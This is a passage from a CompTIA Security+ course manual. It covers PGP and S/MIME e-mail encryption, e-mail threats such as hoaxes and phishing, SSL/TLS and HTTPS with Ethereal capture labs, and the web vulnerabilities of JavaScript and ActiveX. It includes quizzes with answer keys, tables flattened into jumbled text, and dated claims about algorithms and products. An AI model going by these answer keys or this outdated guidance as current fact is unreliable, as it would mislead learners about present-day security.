S/MIME trust model: certificate authorities S/MIME was designed from the outset as a purely hierarchical model. Keys or certificates are trusted based on the trustworthiness of the issuer, which is assumed to be of a higher value than that of the user. The line of trust can be followed up the chain of certificates to some root, which is generally a large commercial organization, a certificate authority engaged purely in the business of verifying identity and assuring the validity of keys or certificates.

518

CompTIA Security+ Certification

Differences between PGP and S/MIME


S/MIME 3 (the current version, which has been accepted as an IETF standard) and OpenPGP (the open, standards-based version that grew out of PGP in 1997) are both protocols for adding authentication and privacy to messages. They differ in many ways, however, and are not designed to be interoperable. Some cryptography algorithms are the same between the two protocols, but others differ. The following table provides a comparison of the two protocols:
Features Structure of messages Structure of digital certificates Algorithm: symmetric encryption Algorithm: digital signature Algorithm: hash MIME encapsulation for signed data MIME encapsulation for encrypted data Trust model Marketplace adoption S/MIME 3 Binary, based on CMS X.509 3DES Diffie-Hellman SHA-1 Choice of multipart/signed or CMS format Application/PKCS#7-MIME Hierarchical Growing quickly because of use in Microsoft and Netscape browsers, e-mail clients, and in SSL encryption Microsoft, RSA, VeriSign OpenPGP PGP PGP 3DES ElGamal SHA-1 Multipart/signed with ASCII armor Multipart/encrypted Web of trust Current encryption standard among security professionals

Marketplace advocates

PGP, Inc., has been dissolved, but some of its products have been absorbed into the McAffee product line Configuration is not intuitive, and certificates must be created; general use is straightforward PGP software must be downloaded and installed

Ease of use

Configuration is not intuitive, and certificates must be obtained and installed; general use is straightforward Already integrated in Microsoft and Netscape products (both commercial and free versions) Certificates must be purchased from a certificate authority, and they have a yearly fee attached

Software

Cost of certificates

PGP Certificates can be generated by anyone and are free

E-mail
Features Key management S/MIME 3 Easy, but you must trust a certificate authority OpenPGP

519

Harder because the user must make decisions on the validity of identities, but you have granular control over whom you trust Compatible with MIME and nonMIME e-mail formats, but the recipient must have PGP installed Status of PGPs centralized management products in doubt

Compatibility

Transparently works with any vendors MIME e-mail client, but not compatible with non-MIME e-mail formats Centralized management possible through public key infrastructure (PKI) offerings

Centralized management

A single e-mail client could use both S/MIME and PGP, but PGP cannot be used to decrypt S/MIME messages and vice versa. There are many differences between an X.509 certificate and a PGP certificate, but the most important are: You can create your own PGP certificate; you must request and be issued an X.509 certificate from a certificate authority. X.509 certificates natively support only a single name for the keys owner, whereas PGP allows multiple fields to describe the keys owner. X.509 certificates support only a single digital signature to attest to the keys validity, but PGP allows the inclusion of many signatures that attest to the validity of the key.

520
Do it!

CompTIA Security+ Certification

B-2:

Comparing S/MIME and PGP

Questions and answers


1 For each of the following characteristics, specify whether the protocol described is S/MIME or PGP. _____ Certificates support multiple signatures _____ Uses X.509 certificates _____ Binds public key to digital signature of Certificate Authority _____ Supports DES, 3DES, and RC2 algorithms _____ Supports CAST, IDEA, 3DES, and Twofish algorithms _____ Encrypts the digital signature _____ Binds public key to digital signature of certificate owner _____ Bundled with Microsoft and Netscape products _____ Software must be downloaded _____ Uses a hierarchical trust model
PGP S/MIME S/MIME S/MIME PGP S/MIME PGP S/MIME PGP S/MIME

E-mail

521

Using PGP to encrypt and sign e-mail


Explanation
In previous versions of this course, a Hotmail account was used to exchange the public key between students and to send encrypted e-mail using Outlook Express. Hotmail, Yahoo, and other free e-mail providers, no longer support managing their mail through Outlook Express using their free e-mail accounts.

To demonstrate how PGP is installed and configured to be able to encrypt and digitally sign e-mail, you will now work through the following steps: Installing and configuring PGP (including generating PGP keys) Exporting public keys Importing public keys The first step is to install and configure PGP on your workstation. PGP can be downloaded free from the International PGP Home Page (www.pgp.com/downloads/desktoptrial.html). To save you some time and protect your privacy, your instructor has already downloaded the software for you. After you've installed PGP, a wizard starts to guide you through the initial setup steps, including generating a PGP key.

Do it!

B-3:

Installing and configuring PGP

Heres how
See the classroom setup instructions for location of the download file.

1 Download the PGP software 2 Extract the zipped file to


C:\Security

According to your Instructors directions.

Open C:\Security 3 Run the


PGPDesktop902_Inner To start the installation.

program Click English 4 Select I accept the license


agreement

5 Click Next 6 Click Next 7 Click Yes 8 Log in as Administrator 9 Click Next 10 Enter user information in the fields provided and then click
Next Enter Student## for Name, Class for Organization and a fictional e-mail address. The file copy starts. To restart your computer. The PGP Setup Assistant starts automatically.

522

CompTIA Security+ Certification 11 Select Use without a license


and disable most functionality The functionality necessary for the PGP-related activities will still be available.

Do not have students enter the evaluation license you received with the download. If you do, all but the first student to enter and submit the license number will receive an error message when trying to license the program.

Click Next 12 Click Next 13 Click Next 14 Click Next 15 Enter Student## and a fictional Yahoo e-mail address Click Next 16 Check Show Keystrokes Enter a passphrase Reenter the passphrase 17 Click Next 18 Click Next 19 Click Next 20 Click Next 21 Click Finish
To accept the default of automatically detecting e-mail accounts. To accept the default outgoing e-mail policies. To view your keystrokes. A longer passphrase is desirable for security reasons To confirm. To generate the key. To accept the default of I am a new user. To specify that you want to generate a PGP key.

E-mail

523

Export and import public keys


Explanation PGP makes this process very easy by allowing you to export your public key to a text file. You can then send the public key to the person who needs to send you encrypted data. Once the person receives the key, they can import it into PGP. After that, they can send you encrypted messages. Do it!

B-4:

Exporting and importing the public key Heres why


(If necessary.) Click Start, then choose All Programs, PGP, PGP Desktop.

Heres how
1 Launch PGP Right-click Student## 2 Choose Export...
Make sure students have removable media available on which to save the exported file.

3 Save the file to a removable media device using the default file name 4 Give the removable media to your partner 5 Insert your partner's removable media into the appropriate drive or port 6 Choose File, Import 7 Navigate to the removable media Select Student##.asc Click Open

Save the file to the removable media with which your instructor has provided you.

Due to an incompatibility between PGP and Network Monitor (which is used in the unit on transmission and storage media) in Windows Server 2003, students have to uninstall PGP when finished with activity B-4.

8 Click Import 9 Close PGP 10 Click Start and then choose


Control Panel, Add or Remove Programs

The key is imported to PGP.

11 Select PGP Desktop, then click


Remove

To start the process of uninstalling PGP. This is necessary due to an incompatibility between PGP and Network Monitor (which is used in the unit on transmission and storage media) in Windows Server 2003.

12 Follow the prompts to uninstall the program and then reboot the computer

524

CompTIA Security+ Certification

Topic C: E-mail vulnerabilities


This topic covers the following CompTIA Security+ exam objective:
# 2.2 Objective Recognize and understand the administration of the following e-mail security concepts Vulnerabilities SPAM Hoaxes

Vulnerabilities
Explanation E-mail has an incredible number of vulnerabilities; moreover, because its the one electronic tool that almost everyone uses, e-mail is attacked frequently. As demonstrated so far, a large number of e-mail vulnerabilities can be addressed using a combination of best practices, virus-scanning software, and secure e-mail. The table below outlines the more common e-mail vulnerabilities and countermeasures for each:
Attack Eavesdropping Vulnerability Lack of confidentiality; because email is sent in clear text, it can be read in transit. Solution E-mail encryption for communications that require confidentiality. Encrypted messages cannot be effectively scanned for viruses until they reach the desktop and are decrypted. Spoofing and masquerading Lack of authentication; dummy email accounts can be set up to pose as trusted businesses and trick users into giving over credit card numbers and other types of information. Lack of authentication; by tricking e-mail servers to send their data through a third node, an attacker can pose as one or both people in an email exchange. Lack of integrity; because e-mail data is sent as plaintext, it can be modified or changed in transit. Digital certificates issued by a trusted certificate authority prove to the customer that the sender of an email really is who he or she says it is. By digitally signing their data, the two parties can authenticate each other and be sure of the senders identity; they also gain the same certainty by encrypting their e-mails. E-mail encryption stops both the reading and manipulation of e-mails; digital signatures on e-mails ensure that if the data is changed in transmission, the recipient will know. Virus filtering software on desktops, servers, and Internet gateways.

Man-in-the-middle attack, session hijacking

Data manipulation

Malware

Malicious software; viruses, Trojan horses, backdoors, and worms can spread through e-mail, destroy data, and be part of a DoS attack on email servers.

E-mail
Attack Social engineering Vulnerability Repudiation; because a variety of email attacks are possible, users can claim they did not send a given message. Solution

525

E-mail encryption and digital signatures provide nonrepudiation, because the sender must have their own digital certificate and passphrase to use them. Choose a strong passphrase for your certificate or key.

Password guessing

A wide variety of password guessing attacks can be used against a PGP key or X.509 digital certificate. Users can send sensitive company data to other untrusted networks or to untrusted parties.

Information leaks

Train users on acceptable use of email; use an e-mail content filtering solution.

Spam
Spam is defined as the act of flooding the Internet with many copies of the same message in an attempt to force the message on people who would not otherwise choose to receive it. Most spam is commercial advertising, often for dubious products and getrich-quick schemes. Spam costs the sender very little to send, as most of the costs are paid for by the recipient or the carriers, rather than by the sender. E-mail spam E-mail spam targets individual users with direct mail messages. E-mail spam lists are often created by scanning Usenet postings, stealing Internet mailing lists, or searching the Web for addresses. On top of that, it costs money for ISPs and online services to transmit spam, and these costs are transmitted directly to subscribers. One particularly nasty variant of e-mail spam is when it is sent to mailing lists (public or private e-mail discussion forums). Many mailing lists limit activity to their subscribers, spammers use automated tools to subscribe to as many mailing lists as possible so they can grab the lists of addresses, or use the mailing list as a direct target for their attacks.

Hoaxes and chain letters


A form of social engineering, like Trojan horses, e-mail hoaxes and chain letters are email messages with content that is designed to get the reader to spread them. Unlike Trojans, these messages do not carry a malicious payload. However, the messages they contain are usually untrue or describe a situation that was resolved long ago. Hoaxes try to get their victim to pass them on using several different methods, including: Appearing to be an authority in order to exploit peoples natural trust Generating excitement about being involved Creating a sense of importance or belonging by passing along information Playing on peoples gullibility or greed

526

CompTIA Security+ Certification Although one might not think of chain letters as an attack on an organization, they in fact can cause as much damage as a virus if enough people take the time to read and forward the message. First, there is the lost productivity of the people who read and forward the message. You might think, It only took me a minute to read the message; therefore, the impact must be insignificant. If you received the message, then you are likely to be one of a group of ten people who all wasted a minute to read the message. Worse, if those ten people forward the hoax onto another ten people each, then the cumulative amount of time lost is about 100 minutes. It doesnt take very long for all the minutes to add up. Exhibit 5-7 illustrates just how fast the costs can mount. There are even more costs. When a gullible user sends a message such as the Nuclear Strike hoax, as shown in Exhibit 5-8, what is the cost to your organizations reputation?

Exhibit 5-7: What hoaxes and chain letters really cost

E-mail

527

Exhibit 5-8: Nuclear strike hoax Its likely your companys reputation would be damaged, if not by the fact that your employees were sent on such an embarrassingly obvious hoax, then by the fact that your employees wasted the time of others with it. Finally, hoaxes that are fake warnings of viruses cause users to take a relaxing attitude toward virus warnings. When a message comes about a real and destructive virus, will your users believe it? Phishing Another scam closely related to hoaxes is phishing. This involves the perpetrator sending e-mail to users and claiming to be a well-known company. The scammer tries to get users to divulge personal information such as bank account, social security, and other personal information. Some of the more well-known companies that have been impersonated are eBay and PayPal. An example of the e-mail that you might receive can be found at www.millersmiles.co.uk/identitytheft/latest-paypal-email-hoax.htm.

The e-mail often directs you to a site that appears to be legitimate. It has the look-andfeel of the official Web site for the company they are impersonating. If you are asked for personal information, check with the company to determine whether they actually sent you the e-mail and check one of the hoax listing sites to see if it is a known scam.

528

CompTIA Security+ Certification Countermeasures for hoaxes Although there are a number of e-mail content filtering solutions that help to mitigate the effect of hoaxes and e-mail chains, the most effective and basic countermeasures are an effective security awareness campaign coupled with a good e-mail policy. Here are some guidelines: Create a policy and train users on what they should do when they receive a virus warning. Typically, the only action they should take is to update the virus definitions on their own machine. They should not forward the warning on to others. Establish that the intranet site is the only authoritative source for advice on virus warnings. Ensure that the intranet site displays virus and hoax information on the home page and is consistently updated. For example: The Nuclear Strike warning message has been declared a hoax. Anybody receiving this warning should discard it. Remember, when receiving e-mail you should never open attachments that are not expected. Inform users that if the virus warning is not listed on the intranet site, they are to forward the warning to a designated account. Check one of the sites that list hoaxes and other urban legends before acting on or forwarding a suspect e-mail. Examples of such sites include snopes.com, hoaxbusters.ciac.org/, and any of the companies that provide anti-virus software.

E-mail Do it!

529

C-1:

Discussing e-mail vulnerabilities

Questions and answers


1 What is the best way to prevent man-in-the-middle or session hijacking attacks against e-mail?
Parties should encrypt their e-mail and digitally sign their data.

2 What is the best way to protect against virus attacks attached to e-mails?
Use antivirus software on workstations, servers, and Internet gateways Train users about safeguards when opening e-mail

3 What is the best way to protect data from manipulation?


Encrypt and digitally sign the e-mail

4 How are e-mail spam lists created? A B C


D

Scanning Usenet postings Stealing internet mailing list Searching the Web for addresses All of the above

5 Hoaxes try to get users to pass a hoax along using which method below?
A B C D

Generating excitement about being involved Playing on peoples gullibility or greed Creating a sense of importance or belonging Appearing to be an authority

6 What is a good countermeasure for hoaxes? (Choose all that apply.)


A B

Create a policy and train users. Inform users to forward the warning if nothing is posted on the intranet site. Establish the Internet site as the only authoritative source for advice on virus warnings. All of the above.

C D

530

CompTIA Security+ Certification

Unit summary: E-mail


Topic A In this topic, you learned how cryptography is used to secure e-mails across insecure networks. You also learned the key cryptography concepts of encryption, digital signatures, and digital certificates, and how encryption methods can be combined to obtain hybrid cryptosystems. In this topic, you learned about two encryption technologiesPGP and S/MIME. You discussed that PGP is the current de facto e-mail encryption standard and S/MIME is the emerging standard in e-mail encryption. You also discussed the differences between PGP and S/MIME. In this topic, you learned that spam is a major detriment to corporate and personal email systems. You learned how hoaxes and e-mail chain letters can be quite damaging. You also discussed how they can be combated using best practices in security awareness training and e-mail content filtering software.

Topic B

Topic C

Review questions
1 Encryption is accomplished by taking data and passing it, along with a value, called a key, through an algorithm that makes the data completely unreadable. True or false?
True

2 3DES is much faster than either IDEA or CAST. True or false?


False: It is actually much slower.

3 Electronic signatures are created by using a hash function. True or false?


True

4 The private key is used for decryption and is kept secret. The public key is used for encryption and is freely distributed to anyone who needs or wants it. True or false?
True

5 Digital certificates consist of which of the following? A The owners public key, which is used to encrypt messages to its owner. B One or more pieces of information that uniquely identify the owner (for example, a name and e-mail address). C Electronic signatures of a signee. D Digital signature of the endorser, stating that the public key actually belongs to the person in question.
E

All of the above

E-mail 6 What size key (in bits) does IDEA use? A 24 B 58 C 56


D

531

128

E 256 7 What does IDEA stand for? A Internal Data Encryption Algorithm
B

International Data Encryption Algorithm

C International Digital Encryption Algorithm D Internal Digital Encryption Algorithm 8 What sizes keys (in bits) does Twofish have?
A B

128 192

C 195
D

256

E 500 9 What does MD5 stand for?


A

Message Digest v 5

B Message Digital 5 C Message Digitalization 5 D Mixed Digest Standard 5 10 How many digital signatures does X.509 support to attest to the keys validity? A 0
B

C Multiple 11 Public key encryption allows the symmetrical key to be distributed encrypted along with the __________ text.
cipher

12 The result of a hash function is a __________ ____________.


message digest

532

CompTIA Security+ Certification 13 X.509 is the standard for digital signatures. True or false?
False: It is a standard for digital certificates.

14 Conventional encryption is normally slower than public key encryption. True or false?
False: It is actually about 1000 times faster.

15 When encrypting e-mail, ____________ encryption provides the ability to compress the message before encryption takes place.
PGP

16 The ______________ encryption algorithm is considered the industry standard encryption algorithm today.
3DES

17 PGP uses X.509 digital certificates. True or false?


False: It uses PGP certificates.

61

Unit 6 Web security


Unit time: 120 minutes Complete this unit, and youll know how to:
A Describe the SSL/TLS and HTTPS

protocols.
B Discuss the vulnerabilities associated with

JavaScript, buffer overflow, ActiveX, cookies, CGI, applets, SMTP relay, and how they are commonly exploited.
C Configure Internet Explorer security.

62

CompTIA Security+ Certification

Topic A: SSL/TLS protocol


This topic covers the following CompTIA Security+ exam objectives:
# 2.3 Objective Recognize and understand the administration of the following Internet security concepts SSL/TLS (Secure Sockets Layer / Transport Layer Security) HTTP/S (Hypertext Transfer Protocol / Hypertext Transfer Protocol over Secure Sockets Layer) 2.4 Recognize and understand the administration of the following directory security concepts SSL/TLS (Secure Sockets Layer / Transport Layer Security) 4.3 Understand and be able to explain the following concepts of PKI (Public Key Infrastructure) Certificates

Transport protocols
Explanation The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are commonly used protocols for managing the security of a message transmitted across the Internet. Developed by Netscape, SSL is also supported by Microsoft and other Internet client/server developers. SSL is included as part of both the Microsoft and Netscape browsers and most Web server products. It has become the de facto standard. TLS is essentially the latest version of SSL, but it is not as widely available in browsers. The SSL/TLS protocol runs between the Transport and Application layers, as shown in Exhibit 6-1. SSL/TLS uses TCP/IP on behalf of the higher-level protocols and allows an SSL-enabled server to authenticate itself to an SSL-enabled client, the client to authenticate itself to the server, and both machines to establish an encrypted connection.
TCP/IP d l TC/IP protocol it

Review the TCP/IP networking model before explaining that SSL/TLS runs on top of TCP. SSL/TLS is encapsulated in a TCP header. Explain that SSL/TLS would be a sub-layer between the Transport layer and the Application layer protocols.

Application Layer Telnet FTP SMTP DNS RIP SNMP

SSL/TLS

Transport Layer

TCP

UDP

Internet Layer

Internet Protocol (IP)

ICMP

Network Interface

Ethernet

PPP

Frame Relay

ATM

Exhibit 6-1: Secure Sockets Layer Protocol

Web security

63

Security mechanisms
SSL/TLS uses ciphers, which enable the encryption of data between two parties, and digital certificates, which provide the authentication of the end points for end-to-end secure communication.

Ciphers
There are two encryption (cipher) types used by SSL/TLS: symmetric encryption (secret key encryption) and asymmetric encryption (public key encryption). Used alone, both ciphers have their shortcomings. Symmetric encryption can be secure only if the shared secret key is securely exchanged. It raises the problem of how to exchange a secret key across the Internet, because the reason for using encryption in the first place is due to the insecure nature of the Internet. Asymmetric encryption solves the problem of securely sharing keys over the Internet, but it requires longer processing times because of the complexity of the algorithm. SSL as well as TLS work around these limitations by using both types of ciphers, first using an asymmetric cipher to securely exchange the shared secret key and then using the secret key to transfer the data. One of the parties picks a random secret key and encrypts it with the other end point devices public key. The encrypted key is then sent to the other party where it is decrypted using the private key known only to itself. No one else can decrypt the secret key because no one else has the private key. After the secret key is identified by each end point, the parties can then use this shared key for standard key encryption, which can be performed quickly. Along with the type of cipher being used, the cipher size or strength also plays a role in secure transactions. Commonly found 40- and 56-bit Web browsers are considered to have weak encryption because these key sizes can be cracked in a short time period (approximately one week) using commonly available processing power. These weakly encrypted browsers are common because of the U.S. regulations on exportation of strong encryption. Its expected these weak browsers will become less common with the recent changes in regulations made by the U.S. government. Ciphers using 128-bit keys provide a much higher level of protection. Some SSL/TLSenabled Web servers require the browser to support 128-bit ciphers to establish a connection. Do it!

A-1:

Determining the browsers cipher strength Heres why

Heres how
1 Log on as Administrator 2 Open Internet Explorer 3 Choose Help, About Internet
Explorer

To determine what key size is currently enabled on your browser. The heading called Cipher Strength specifies the key size. If you dont have 128-bit encryption, you can click on the Update Information link to the right of the Cipher Strength heading to download the 128-bit encryption software.

64

CompTIA Security+ Certification

Digital certificates
Explanation Digital certificates enable authentication of the parties involved in a secure transaction. A typical certificate has the following components: The certificate issuers name The entity for which the certificate is being issued (also called the subject) The public key of the subject Time stamp Certificates are typically issued by certificate authorities (CA) that act as a trusted third party. Certificates can be considered a standard way of binding a public key to a name, verifying the identity of the parties involved. Certificates prevent users from impersonating other parties. There are two distinct types of certificate authorities that issue digital certificates: Public certificate authorities, such as VeriSign, are recognized as trusted by most Web browsers and servers. A certificate issued by a public CA is usually used when no other relation exists between two parties. Private certificate authorities are established in-house by enterprises that need to create their own closed, private certificate infrastructure.

Web security Do it!

65

A-2:

Installing Ethereal to be able to analyze SSL packets Heres why


Your instructor will advise you on the download steps.

Heres how
Explain to students that Ethereal is used to examine data from a live network via an Ethernet interface, and there are four main tasks to perform in this activity.

1 Download the ethereal-setup0.10.12.exe file to


C:\Security

2 Download the WinPcap autoinstaller program to


C:\Security

Your instructor will advise you on the download steps.

3 Open C:\Security 4 Double-click the


WinPcap_3_1.exe file

To install WinPcap. To run the auto-install program.

Accept all defaults and the user agreement After the installation is complete, restart the computer 5 Log in as Administrator 6 Open C:\Security Double-click the
Ethereal-setup-0.10.12 file To install Ethereal.

Accept the license agreement and all defaults 7 Check Run Ethereal 0.10.12 and click Finish
To launch Ethereal.

66

CompTIA Security+ Certification

Encryption and online banking


Explanation Although many different types of sites require encryption of data that travels over the Internet, banks clearly have a strong interest. NetBank was one of the first FDICinsured banks with accounts that can be fully managed over the Internet. With all of the potential vulnerabilities present on the Internet, all account activity is encrypted using SSL. Youll observe encrypted and non-encrypted interactions using Ethereal.

Do it!

A-3:

Configuring Ethereal and capturing a Web session Heres why

Heres how
1 Launch a Web browser Go to http://www.netbank.com 2 Return to the open Ethereal Program 3 Choose Capture, Options 4 Click the pull-down Interface menu Choose the interface thats connected to your Ethernet network 5 Clear Capture packets in
Promiscuous mode

You might have only one interface listed.

6 Check the three Name Resolution selections

Click Start 7 Return to the browser Refresh the page thats already loaded

After completing the configuration to begin capturing packets.

Wait until the refresh is finished.

Web security 8 Return to the Ethereal Capture window

67

You'll see information about captured packets.

Click Stop 9 Maximize the Ethereal Network Analyzer window

The Ethereal Network Analyzer window displays.

68

CompTIA Security+ Certification

Working with Ethereal's capture output


Explanation After you run the Ethereal Capture program, you'll need to analyze the information it captured. You do this in the Ethereal Network Analyzer window, which is divided into several panes of information.

Do it!

A-4:

Reviewing decoded packets in plaintext Heres why

Heres how
1 Review the records in the top pane 2 Click on the first record with HTTP as the Protocol and GET as the first word of the Info field Review the information in the middle pane 3 Click on any entry in the middle pane 4 Expand Internet Protocol Locate the source and destination addresses

This shows information about the protocols used to refresh this page. You will see the equivalent data highlighted in the bottom pane. This is the actual data, coded in hexadecimal and ASCII format. In the middle pane. Record the entries below: Source: ___________________________ Destination: _______________________

5 Expand Transmission
Control Protocol

(In the middle pane.)

Locate the source and destination ports and the next sequence number

Record the entries below: Source: _______________________________ Destination: ___________________________ Next sequence number: __________________

6 Expand the Hypertext Transfer Protocol entry Locate the Host entry and click on it 7 Return to the top pane and review the information for several of the other HTTP packets with a destination of your local computer

In the middle pane.

The hostname is selected in the bottom pane as well. This should be readable as ASCII text. All HTTP data should be readable in the bottom pane. Make sure you select the Hypertext Transfer Protocol in the middle pane first.

Web security

69

Analyzing SSL sessions


Explanation You can also use Ethereal to analyze secure SSL sessions, such as a session with an online banking institution.

Do it!

A-5:

Analyzing an SSL session Heres why

Heres how
1 In the Netbank browser window, click Account Login

To access Web page using SSL.

2 Check In the future, do not show this warning and click


OK
Make sure students do not click Login.

If prompted by a Security Alert message.

3 Enter your first and last names as the User ID and Password, respectively, but dont click Login 4 Return to Ethereal and choose
Capture, Start

Click Continue without


Saving

To begin a new capture.

5 In the browser, click Login When the page finishes loading with an error, stop the Ethereal Capture 6 In the Ethereal Network Analyzer window, review the first three TCP packets by clicking on them in the top pane 7 Find the following entries in the top pane and review the Secure Socket Layer content of these frames in the middle pane SSL Client Hello Server Hello Change Cipher Spec Application Data

If you're prompted by AutoComplete, specify to not offer to remember passwords, and click No.

These are the three-way handshake between your host and the server to establish the connection.

The first three entries describe the negotiation for and exchange of ciphers. The Application Data entry contains the transmission of the HTML data. Notice that you can no longer read the HTML script in the bottom pane due to the SSL encryption.

8 Close Ethereal

610
Do it!

CompTIA Security+ Certification

A-6:

Reviewing SSL and TLS

Questions and answers


1 Where does the SSL/TLS protocol fit within the TCP/IP protocol stack? A B C
D

At the Network layer At the Physical layer Between the Data Link layer and the Network layer Between the Transport layer and the Application layer

2 What are the two encryption types used by SSL and TLS?
Asymmetric (public key) and symmetric (secret key)

3 How does SSL/TLS use both asymmetric and symmetric ciphers?


It encrypts the data with a secret key, and then encrypts the secret key using the asymmetric cipher. It then transmits both to the receiver. The receiver uses the private key to decrypt the secret key, and then uses the secret key to decrypt the data.

4 Which of the following cannot be found in a digital certificate? A B


C

Certificate issuers name Entity for whom the certificate is being issued Public key of the certificate authority Time stamp

5 Public certificate authorities are used when no other relation exists between two parties. True or false?
True

Web security

611

Implementation using HTTPS


Explanation The Hypertext Transfer Protocol over SSL (HTTPS) is a communications protocol developed by Netscape to transfer encrypted information between computers over the World Wide Web. HTTPS is essentially a variation of HTTP, the commonly used Internet protocol, which uses SSL encryption for security. Most implementations of the HTTPS protocol are used to enable online purchasing or the exchange of private information and resources over insecure networks. Accessing a secure server often requires some sort of registration, login, or purchase. After a digital certificate is installed on a secure server, a client is able to connect to the server using the HTTPS protocol on an SSL-enabled Web browser such as Netscape Navigator or Microsoft Internet Explorer. Any file that is transmitted from the server to a client with a Web browser using the HTTPS protocol is considered secure. The following steps outline how HTTP combines with SSL to enable secure communication between a client and a server: 1 By accessing a URL with HTTPS, the client requests a secure transaction and informs the server about the encryption algorithms and key sizes that it supports. 2 The server sends the requested server certificate, which contains the servers public key that has been signed by a CA. The CA is considered a trusted party with a public key available to all clients. The CA also sends a list of supported ciphers and key sizes in order of priority. 3 The client then generates a new secret symmetric session key based on the priority list sent by the server. The client also compares the CA that issued the certificate to its list of trusted Cas, verifies the certificate has not expired, and confirms the certificate belongs to the server intended for communication. 4 After the validity of the certificate has been confirmed, the client encrypts a copy of the new session key it generated with the public key of the server obtained from the certificate. The client then sends the new encrypted key to the server. 5 The server decrypts the new session key with its own private key. Upon completion of this step, both the client and server have the same secret session key that can now be used to secure further communication and data transport. When accessing a secure Web site using SSL, the location bar on the browser will show https instead of http and the padlock icon will appear closed on the status bar of the browser. Only the URL using the HTTPS protocol is considered secure, therefore, all pages that need to be transferred in a secure mode need to utilize HTTPS.

As an exercise, have students draw a flowchart of sorts that describes the process and the decisions that occur during the processthis should help them understand how the public and secret keys are used.

612

CompTIA Security+ Certification

Viewing certificates
Explanation You can view certificates by double-clicking the padlock icon in the browser's status bar. The General tab provides general information about the certificate, such as to whom the certificate was issued, who it was issued by, and when it's valid. The Details tab provides you with more detailed information, including: Version The version of X.509 used to create the certificate. Serial Number The unique serial number for the certificate. Signature Algorithm The encryption algorithm used to create the certificates signature. Issuer The issuer of the certificate. Valid From The date from which the certificate is valid. Valid To The date after which the certificate expires. Subject Used to establish the certificate holder, which typically includes the identification and geographic information. Public Key The certificates encrypted public key. Thumbprint Algorithm The encryption algorithm used to create the certificates thumbprint. Thumbprint The encrypted thumbprint of the signature (for example, message digest). Friendly Name The descriptive name assigned to the certificate. Do it!

A-7:

Viewing the SSL certificate Heres why

Heres how
1 In your browser, return to the Netbank login page 2 Double-click the SSL icon

(The padlock icon in the status bar.)

Review the general certificate information

Web security 3 Activate the Details tab

613

4 Click each field 5 Activate the Certification Path tab

To view detailed certificate information.

6 Select the CA 7 Click View Certificate 8 Click OK

(If necessary.) To view the certificate of the CA. To close the certificate information.

614
Do it!

CompTIA Security+ Certification

A-8:

Discussing HTTPS

Questions and answers


1 Return to the https://secure.nhetbank.com/login.htm. When does this certificate expire?
(Answers will vary.) As of this books printing, 5/24/2006.

2 What algorithm was used to create the message digest?


sha1

3 What algorithm was used to sign the certificate?


sha1RSA

4 How does the browser indicate whether an HTTPS page is displayed?


The location bar on the browser will show https instead of http, and the padlock icon will appear closed on the status bar of the browser.

5 The client generates a secret session key based on the _______________ sent by the server.
Priority list

6 The client encrypts a copy of the new session key it generated with the public key of the server obtained from the certificate. True or false?
True

Web security

615

Topic B: Vulnerabilities of Web tools


This topic covers the following CompTIA Security+ exam objective:
# 2.3 Objective Recognize and understand the administration of the following Internet security concepts Vulnerabilities Java Script ActiveX Buffer Overflows Cookies Signed Applets CGI (Common Gateway Interface) SMTP (Simple Mail Transfer Protocol) Relay

Web application security


Explanation With the rising complexity of Web and multimedia applications, online business tools and information sources are becoming more vulnerable to outside threats. Any combination of increasingly complex code, ineffective development schedules, lack of quality assurance, and unskilled personnel can lead to serious security loopholes. For many corporations, security of Web applications and online services is as critical an issue as their intended functionality.

JavaScript
JavaScript is a scripting language developed by Netscape to enable Web authors to design interactive sites. JavaScript code is typically embedded into an HTML document and placed somewhere between the <head> and </head> tags. The HTML tags that indicate the beginning and ending of JavaScript code are <script> and </script>. Its possible to have multiple blocks of code within an HTML page, as long as they are surrounded by the aforementioned tags. One could also make a reference to an external JavaScript code instead of inserting the actual code within the body of the HTML code. A typical example of JavaScript code within an HTML document is as follows:
<html> <head> <title>Example JavaScript</title> <script language="JavaScript"> document.writeln("Example"); </script> </head> <body> . . </body> </html>

616

CompTIA Security+ Certification Many Web browsers support the ability to download JavaScript programs with an HTML page and execute them within the browser. Such programs are often used to interact with the client or browser user and transmit information back to the Web server that provided the page. These programs can also perform tasks outside of the users control such as changing a default Web page or sending an e-mail out to a distribution list. Vulnerabilities JavaScript programs are executed based on the intended functionality and security context of the Web page with which they were downloaded. Such programs have restricted access to other resources within the browser. Security loopholes exist in certain Web browsers that permit JavaScript programs to monitor a clients (browsers) activities beyond its intended purpose. The execution of such programs and passing of information between the server and browser or client usually takes place without the knowledge of the client. Malicious JavaScript programs can even make their way through firewalls, which lack the configuration parameters to prevent such activities. Some of the documented security holes associated with JavaScript on various browsers are: Monitoring Web browsing The CERT Coordination Center unveiled JavaScript vulnerabilities that allow an attacker to monitor the browsing activities of a user even when visiting a secure (HTTPS) Web page and behind a firewall. This information includes the URL addresses of browsed pages and cookies downloaded to client machines by the visited Web servers. Reading password and other system files JavaScript implementation of Netscape versions 4.04 through 4.74 allows a JavaScript imbedded into an HTML code to read sensitive files (including system password files) and transmit them back to the owner of the page. A similar vulnerability is inherent in the Microsoft Internet Explorer 4.0-4.01. Reading browsers preferences Certain versions of Netscape allow an imbedded JavaScript to access the preferences file, which contains information such as e-mail servers, mailbox files, e-mail addresses, and even email passwords. Safeguards Many browsers provide additional patches to fix JavaScript-related vulnerabilities. These patches are typically downloadable from the vendors (such as Microsoft and Netscape) Web sites. Unless the patch is available from the browser vendor, users should disable JavaScript to avoid being victimized by such programs.

Web security

617

ActiveX
ActiveX is a loosely defined set of technologies developed by Microsoft that provides tools for linking desktop applications to WWW content. It enables self-contained software components to interact with a wide variety of applications. Certain components of ActiveX can be triggered by use of HTML scripts to provide rich Web content to clients. For instance, ActiveX technology allows users to view Word and Excel documents directly from a browser interface. MS Office applications (Microsoft Access, Excel, and PowerPoint) are examples of built-in ActiveX components. Vulnerabilities These applications utilize embedded Visual Basic code that compromises the integrity, availability, and confidentiality of a target system. Microsoft Office specifications support the integration of certain kinds of macros, written in Visual Basic (VB), into MS Office documents. An attacker could potentially embed harmful macros into these documents that could compromise a target system or information stored on that system. After embedding malicious macros into such documents, an attacker can create an HTML interface or link that references the infected file. The HTML is then distributed by e-mail to the target systems. If the receiver of the infected files is an HTML-enabled mail client, the embedded code in the referenced document is executed without the Web clients knowledge. Many mail clients provide an auto preview feature, so no action might be required on the part of the victim for this action to occur. As a result of this vulnerability, an attacker could gain access to sensitive information (passwords or other private data stored on the system), edit the registry settings of the target system, or use the target system to launch attacks on other systems, as in the case of a distributed denial-of-service attack. Safeguards Microsoft has developed certain patches to address 